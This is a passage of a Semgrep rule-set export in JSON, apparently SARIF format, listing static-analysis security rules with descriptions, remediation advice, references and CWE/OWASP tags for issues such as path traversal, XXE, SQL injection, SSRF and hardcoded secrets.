[https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf](https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf)\n","text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal","id":"generic.nginx.security.alias-path-traversal.alias-path-traversal","name":"generic.nginx.security.alias-path-traversal.alias-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.alias-path-traversal.alias-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"help":{"markdown":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)\n - [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf)\n","text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","id":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","name":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"help":{"markdown":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth)\n - [https://cwe.mitre.org/data/definitions/477.html](https://cwe.mitre.org/data/definitions/477.html)\n","text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"helpUri":"https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth","id":"python.pymongo.security.mongodb.mongo-client-bad-auth","name":"python.pymongo.security.mongodb.mongo-client-bad-auth","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymongo.security.mongodb.mongo-client-bad-auth"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"help":{"markdown":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text)\n - [https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss](https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss)\n","text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","id":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","name":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","id":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","name":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/www-community/HttpOnly](https://owasp.org/www-community/HttpOnly)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","id":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","name":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"help":{"markdown":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor)\n - [https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption](https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption)\n","text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","id":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","name":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.knex-express.knex-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.knex-express.knex-express","id":"javascript.express.db.knex-express.knex-express","name":"javascript.express.db.knex-express.knex-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.knex-express.knex-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"help":{"markdown":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected","id":"python.lang.security.audit.exec-detected.exec-detected","name":"python.lang.security.audit.exec-detected.exec-detected","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.exec-detected.exec-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"help":{"markdown":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security)\n - [https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration](https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration)\n","text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"helpUri":"https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","id":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","name":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"help":{"markdown":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2)\n - [https://jinja.palletsprojects.com/en/2.11.x/api/#basics](https://jinja.palletsprojects.com/en/2.11.x/api/#basics)\n","text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"helpUri":"https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","id":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","name":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"help":{"markdown":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password)\n - [https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password](https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password)\n","text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","id":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","name":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"help":{"markdown":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html)\n","text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","id":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","name":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"help":{"markdown":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","id":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","name":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure 